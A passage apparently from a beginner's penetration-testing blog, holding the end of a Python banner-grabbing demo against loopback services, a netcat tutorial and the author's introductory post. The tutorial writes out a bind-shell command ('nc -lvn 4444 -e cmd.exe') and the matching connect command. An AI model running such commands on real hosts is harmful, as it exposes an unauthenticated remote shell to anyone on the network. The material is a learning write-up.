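        conn.settimeout(timeout)
        try:
            data = conn.recv(max_bytes)
        except socket.timeout:
            return ("silent", None)
    text = data.decode("latin-1", "replace").strip()
    return ("banner", text) if text else ("silent", None)


def start_fake_service(banner, hold):
    """Loopback service for the demo: sends `banner` (or nothing) and keeps the
    connection open until `hold` is set, like a server waiting for the client."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # ephemeral port
    listener.listen(1)

    def serve():
        conn, _ = listener.accept()
        with conn:
            if banner:
                conn.sendall(banner)
            hold.wait(10)
        listener.close()

    threading.Thread(target=serve, daemon=True).start()
    return listener.getsockname()[1]


def demo(timeout=0.5):
    """Grab from a chatty service and a silent one; return both results."""
    hold = threading.Event()
    chatty_port = start_fake_service(SMTP_BANNER, hold)
    quiet_port = start_fake_service(b"", hold)
    results = (grab_banner("127.0.0.1", chatty_port, timeout),
               grab_banner("127.0.0.1", quiet_port, timeout))
    hold.set()  # let both fake services shut down
    return results


if __name__ == "__main__":
    for status, text in demo():
        print(status, text or "")
```

Against a real host, call grab_banner with the address and port 25; the ("silent", None) result corresponds to the "sometimes, but not always" case described above, where you would have to send a command (or check another port) to learn anything more.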
Another fun thing one can do with netcat is command redirection. Using the "-e" switch, you can redirect standard input, output and error to a specific port. So we can essentially send a command shell via netcat; let's do this.
Imagine two users on the same network, John and Cindy. John needs Cindy's assistance on his computer and wishes to send her a command shell over the network to her computer.
So let's start netcat on a particular port and redirect our command shell to it.
From John's computer:
C:\>nc -lvn 4444 -e cmd.exe
This will basically redirect all input/output & errors from cmd.exe to port 4444.
From Cindy's computer:
Now that John's netcat is waiting for a connection, all that Cindy needs to do is connect to John's computer on port 4444 and she should receive the command prompt.
linux~#nc -nv -John's ip here- 4444
This is called a bind shell. Try it and see...
Obligatory first post...
Well, after years of reading other people's blogs, and after weeks of debating whether I should start one of my own and wondering what I would write about, I finally figured out a subject... computers, network security and other related subjects.
Now, I'm no expert. Not a professional security consultant, nor am I a security analyst. I'm a system administrator, presently learning the ins and outs of security.
Figured I'd use a blog as a reference. I'll post links to articles related to computer networking and network security, and maybe type up some of my own learning experiences during my journey into this strange/difficult and mythical subject known as "Penetration Testing".
A little about myself I suppose. Been in IT for a few years now, and like many I've had a computer since I was a kid (back in the 8086 days). Got a few certifications such as MCDST, Comptia Linux+, Network+, i-Net+ and for some reason I have a CIW certification...don't ask.
Presently working on Offensive Security 101 [now known as Pentesting with Backtrack], so I'm looking forward to eventually getting the Offensive Security Certified Professional, or OSCP. So odds are, I'll mostly be posting my experiences along the course, without going against the course's copyright. Let me tell you, this one is hard...